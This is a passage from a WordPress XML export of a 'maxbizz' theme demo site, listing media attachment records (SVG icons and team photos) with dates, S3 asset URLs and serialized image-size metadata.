		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-elements]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-elements.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-elements.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:28:"2020/09/pheader-elements.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:27:"pheader-elements-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"pheader-elements-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"pheader-elements-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"pheader-elements-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"pheader-elements-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-elements-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-elements-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>interface</title>
		<link>http://wpdemo.archiwp.com/maxbizz/elements/interface/</link>
		<pubDate>Wed, 09 Sep 2020 07:02:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/interface.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>629</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:02:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:02:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[interface]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/interface.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/interface.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>hourglass</title>
		<link>http://wpdemo.archiwp.com/maxbizz/elements/hourglass/</link>
		<pubDate>Wed, 09 Sep 2020 07:46:57 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/hourglass.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>650</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:46:57]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:46:57]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[hourglass]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/hourglass.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/hourglass.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart</title>
		<link>http://wpdemo.archiwp.com/maxbizz/elements/chart/</link>
		<pubDate>Wed, 09 Sep 2020 08:11:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>653</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:11:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:11:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/chart.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>clock</title>
		<link>http://wpdemo.archiwp.com/maxbizz/elements/clock/</link>
		<pubDate>Wed, 09 Sep 2020 08:23:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/clock.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>659</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:23:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:23:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[clock]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/clock.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/clock.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>aim</title>
		<link>http://wpdemo.archiwp.com/maxbizz/elements/aim/</link>
		<pubDate>Wed, 09 Sep 2020 08:24:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/aim.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>660</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:24:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:24:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[aim]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/aim.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/aim.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>money</title>
		<link>http://wpdemo.archiwp.com/maxbizz/elements/money/</link>
		<pubDate>Wed, 09 Sep 2020 08:25:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/money.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>663</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:25:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:25:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[money]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/money.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/money.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>portfolio</title>
		<link>http://wpdemo.archiwp.com/maxbizz/elements/portfolio-2/</link>
		<pubDate>Wed, 09 Sep 2020 08:35:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/portfolio.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>666</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:35:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:35:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/portfolio.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/portfolio.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-team/pheader-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:37:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>691</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:37:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:37:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:24:"2020/09/pheader-team.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:23:"pheader-team-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"pheader-team-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"pheader-team-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"pheader-team-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"pheader-team-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-team-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-team-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team5</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-team/team5/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:10 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>694</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:10]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:10]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team5.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:17:"team5-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team5-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team5-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team6</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-team/team6/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>695</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team6.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:17:"team6-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team6-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team6-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team6-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team7</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-team/team7/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:13 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team7.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>696</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:13]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:13]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team7]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team7.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team7.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team7.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:17:"team7-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team7-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team7-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team7-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team8</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-team/team8/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team8.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>697</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team8]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team8.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team8.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:17:"2020/09/team8.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:17:"team8-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:17:"team8-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:17:"team8-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:17:"team8-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-team/image1-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:53:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>699</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:53:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:53:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
